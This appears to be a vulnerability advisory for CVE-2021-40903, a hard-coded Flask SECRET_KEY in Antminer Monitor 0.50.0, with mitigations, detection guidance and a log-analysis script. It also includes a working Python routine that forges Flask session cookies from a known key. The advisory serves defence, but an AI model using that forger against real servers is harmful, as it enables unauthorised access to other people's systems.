CVE-2021-40903

9.8 CRITICAL

📋 TL;DR

CVE-2021-40903 is an authentication bypass in Antminer Monitor 0.50.0. The Flask settings file ships with a static SECRET_KEY instead of a value generated per installation. Flask uses SECRET_KEY to sign its session cookie, so anyone who knows the shipped value can mint a valid session for any user without ever presenting credentials and reach the monitoring interface. Every installation of 0.50.0 that keeps the default settings is affected.

💻 Affected Systems

Products:
  • Antminer Monitor
Versions: 0.50.0
Operating Systems: Any platform that runs the Flask application (Linux, Windows)
Default Config Vulnerable: ⚠️ Yes
Notes: Only version 0.50.0 is listed as affected; earlier releases are not assessed here.

📦 What is this software?

Antminer Monitor is a small Flask web application for monitoring Antminer ASIC miners from a browser. It runs as a single Python process that, by default, listens on TCP port 5000 and protects its pages with a login.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete takeover of the monitoring interface. Where the interface can change miner or pool settings, an attacker can disrupt mining or divert its payout, and the compromised host becomes a foothold into the rest of the network.

🟠

Likely Case

Unauthenticated access to the miner statistics and, where the interface allows it, to the configuration of connected Antminer devices, leading to mining disruption or unwanted configuration changes.

🟢

If Mitigated

Limited impact if the host is isolated from the internet and network access is tightly restricted, but anyone who can still reach the port can bypass authentication, because the bypass needs no credentials and leaves no failed login behind.

🌐 Internet-Facing: HIGH - Exposed instances can be found by port scanning and taken over without credentials.
🏢 Internal Only: HIGH - Even on an internal network, anyone who can reach the port can forge a session, because the secret is the same on every installation rather than per deployment.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: CONFIRMED
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

The attacker needs only network reachability to the Flask port and the SECRET_KEY that ships with the software. No credentials or user interaction are required: the public exploit signs a session cookie with the known key and presents it to the server, which accepts it as a legitimate logged-in session.
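To make the mechanism concrete, the following is an added example, not code from the Antminer Monitor project or from this page. Using only the Python standard library it reproduces the signing scheme behind Flask's default session cookie (itsdangerous' URLSafeTimedSerializer: URL-safe base64 payload and timestamp, HMAC-SHA1 with a key derived from SECRET_KEY and the fixed salt "cookie-session", uncompressed payloads only) and shows why a shipped key is fatal: the same cookie that a default install accepts is rejected the moment the key is unique to the host. The key string "static-secret" and the session field "_user_id" are assumptions; the real shipped value and the field name the application checks are not reproduced here.

```python
import base64
import hashlib
import hmac
import json
import secrets
import time
from typing import Optional

# Flask signs its session cookie with itsdangerous' URLSafeTimedSerializer:
# HMAC-SHA1 whose key is derived from SECRET_KEY and this fixed salt.
SALT = b"cookie-session"

# Placeholder standing in for the fixed value shipped in settings.py (assumption;
# the real string is not reproduced here). What matters is that it is identical
# on every installation, so an attacker can read it from the source.
STATIC_SECRET_KEY = "static-secret"


def _b64encode(data: bytes) -> bytes:
    """URL-safe base64 without padding, the way itsdangerous emits it."""
    return base64.urlsafe_b64encode(data).rstrip(b"=")


def _b64decode(data: bytes) -> bytes:
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def _signature(secret_key: str, value: bytes) -> bytes:
    """itsdangerous 'hmac' key derivation, then HMAC-SHA1 over the signed value."""
    derived = hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()
    return _b64encode(hmac.new(derived, value, hashlib.sha1).digest())


def forge_session_cookie(secret_key: str, session: dict,
                         timestamp: Optional[int] = None) -> str:
    """Mint a cookie the server will accept. Nothing but the key is needed:
    the payload is plain (readable) base64 JSON, and the timestamp is chosen
    by whoever signs, so there is no per-user secret in the scheme."""
    payload = _b64encode(json.dumps(session, separators=(",", ":")).encode())
    ts = int(time.time()) if timestamp is None else timestamp
    ts_bytes = ts.to_bytes((ts.bit_length() + 7) // 8, "big")
    value = payload + b"." + _b64encode(ts_bytes)
    return (value + b"." + _signature(secret_key, value)).decode()


def verify_session_cookie(secret_key: str, cookie: str,
                          max_age: Optional[int] = None) -> Optional[dict]:
    """What the server does on every request: return the session dict if the
    signature (and optional age limit) checks out, otherwise None."""
    parts = cookie.encode().rsplit(b".", 2)
    if len(parts) != 3:
        return None
    payload, ts_b64, sig = parts
    if not hmac.compare_digest(_signature(secret_key, payload + b"." + ts_b64), sig):
        return None
    if max_age is not None:
        issued = int.from_bytes(_b64decode(ts_b64), "big")
        if time.time() - issued > max_age:
            return None
    return json.loads(_b64decode(payload))


def default_install_vs_hardened_install():
    """Forge one cookie offline with the shipped key and present it to two
    servers: one still on the static key, one re-keyed per host."""
    # "_user_id" is the field Flask-Login stores; assumed here, not taken from the page.
    forged = forge_session_cookie(STATIC_SECRET_KEY, {"_user_id": "1"})
    accepted_by_default = verify_session_cookie(STATIC_SECRET_KEY, forged)
    per_host_key = secrets.token_hex(32)  # what the sed workaround below writes
    accepted_by_hardened = verify_session_cookie(per_host_key, forged)
    return accepted_by_default, accepted_by_hardened


if __name__ == "__main__":
    default, hardened = default_install_vs_hardened_install()
    print("default install accepts forged session:", default)   # the session dict
    print("re-keyed install accepts forged session:", hardened)  # None
```

The signature proves only that the signer knew SECRET_KEY, which is exactly why the fix is a key nobody else can know. Note also that the payload is readable by anyone holding the cookie, so nothing secret should ever be stored in a Flask session regardless of the key.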

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Not available

Vendor Advisory: Not available

Restart Required: Yes for the workaround below. settings.py is read when the Flask process starts, so the process must be restarted for a new SECRET_KEY to take effect; the restart also invalidates every existing session, including any forged ones.

Instructions:

No official patch exists. Upgrade if a fixed release becomes available; until then apply the workarounds below.

🔧 Temporary Workarounds

Modify Flask Secret Key

linux

Replace the static SECRET_KEY in settings.py with a value generated on this host, then restart the application. The pattern matches whatever value is currently assigned, since the shipped string is not reproduced here; check afterwards that the file contains exactly one SECRET_KEY line.

sed -i -E "s/^SECRET_KEY[[:space:]]*=.*/SECRET_KEY = '$(openssl rand -hex 32)'/" settings.py

Implement Network Access Controls

linux

Allow only trusted addresses to reach the Flask port (5000 by default; adjust if the application is bound elsewhere). Rule order matters: the ACCEPT must come before the DROP, and these rules are not persistent across reboots unless saved with the distribution's iptables tooling.

iptables -A INPUT -p tcp --dport 5000 -s trusted_ip -j ACCEPT
iptables -A INPUT -p tcp --dport 5000 -j DROP

🧯 If You Can't Patch

  • Isolate the Antminer Monitor host from the internet and restrict which internal addresses can reach its port
  • Put the application behind a reverse proxy that enforces its own authentication (for example HTTP basic auth or SSO), and bind Flask to localhost so the proxy is the only way in

🔍 How to Verify

Check if Vulnerable:

Confirm the installed version is 0.50.0 and inspect settings.py: if SECRET_KEY is assigned the literal string that ships with the software, the installation is vulnerable.

Check Version:

Check version in application interface or configuration files

Verify Fix Applied:

Confirm that SECRET_KEY in settings.py is no longer the shipped value, that it is a long random string (for example 32 or more hex-encoded bytes), that it is not committed to version control or shared between installations, and that the application has been restarted since the change.

📡 Detection & Monitoring

Log Indicators:

  • Requests to authenticated pages from a client that never performed a login: a forged cookie produces no login event and no login failure
  • Logins or sessions from addresses that do not normally manage the miners
  • Unexpected configuration changes

Network Indicators:

  • Unusual traffic to the Flask server port (default 5000), especially from new source addresses
  • Session cookies presented by clients that never sent a request to the login page

SIEM Query:

source="antminer-monitor" AND (event="auth_failure" OR event="config_change")

This query catches failed logins and configuration changes only. A forged session cookie produces neither, so also alert on successful requests to protected pages from a client with no preceding successful login.
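Because the bypass never fails a login, the most useful signal is a client that reaches protected pages without ever logging in. The following is an added example, not part of the original page or the Antminer Monitor project, that runs that logic over constructed access-log lines in the style werkzeug prints for a Flask app. The paths other than /login and the sample addresses are assumptions; the application's real routes are not on the page.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample (not real data) in the format werkzeug/Flask writes for each request.
# 10.0.0.5 logs in normally; 203.0.113.7 never touches /login yet gets a 200 from a
# protected page (forged session); 192.0.2.9 fails a login; 198.51.100.4 is bounced
# to the login page with a 302, which is the normal unauthenticated behaviour.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /login HTTP/1.1" 200 -
10.0.0.5 - - [10/Oct/2023:13:55:40 +0000] "POST /login HTTP/1.1" 302 -
10.0.0.5 - - [10/Oct/2023:13:55:41 +0000] "GET / HTTP/1.1" 200 -
203.0.113.7 - - [10/Oct/2023:14:02:10 +0000] "GET / HTTP/1.1" 200 -
203.0.113.7 - - [10/Oct/2023:14:02:15 +0000] "POST /miners/add HTTP/1.1" 302 -
192.0.2.9 - - [10/Oct/2023:14:05:00 +0000] "POST /login HTTP/1.1" 200 -
192.0.2.9 - - [10/Oct/2023:14:05:03 +0000] "GET /login HTTP/1.1" 200 -
198.51.100.4 - - [10/Oct/2023:14:06:12 +0000] "GET /miners HTTP/1.1" 302 -
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Routes that are reachable without a session (assumed; adjust to the deployment).
PUBLIC_PREFIXES = ("/login", "/static/")


def parse(line: str) -> Optional[dict]:
    """Split one access-log line into its fields, or None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def find_unauthenticated_access(log_text: str) -> List[Tuple[str, str, str]]:
    """Return (timestamp, ip, request) for successful hits on protected pages by
    clients that never completed a login. Only 2xx responses are flagged: a 3xx
    on a protected path is ambiguous, because the login redirect is also a 302.
    Clients are keyed by IP because the access log carries no session id, so
    NAT or a proxy in front of the app will blur the picture."""
    logged_in = set()
    hits = []
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ip, method, path = rec["ip"], rec["method"], rec["path"]
        status = int(rec["status"])
        if path == "/login" and method == "POST" and status == 302:
            logged_in.add(ip)  # successful login redirects away from the form
            continue
        if path.startswith(PUBLIC_PREFIXES):
            continue
        if 200 <= status < 300 and ip not in logged_in:
            hits.append((rec["ts"], ip, f"{method} {path}"))
    return hits


if __name__ == "__main__":
    for ts, ip, request in find_unauthenticated_access(SAMPLE_LOG):
        print(f"{ts} {ip} reached protected page without login: {request}")
```

Run against a real log, feed the output to whichever alerting pipeline already ingests the SIEM events above; the login-tracking state should be kept across log rotations, since a legitimate session can outlive a single file.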
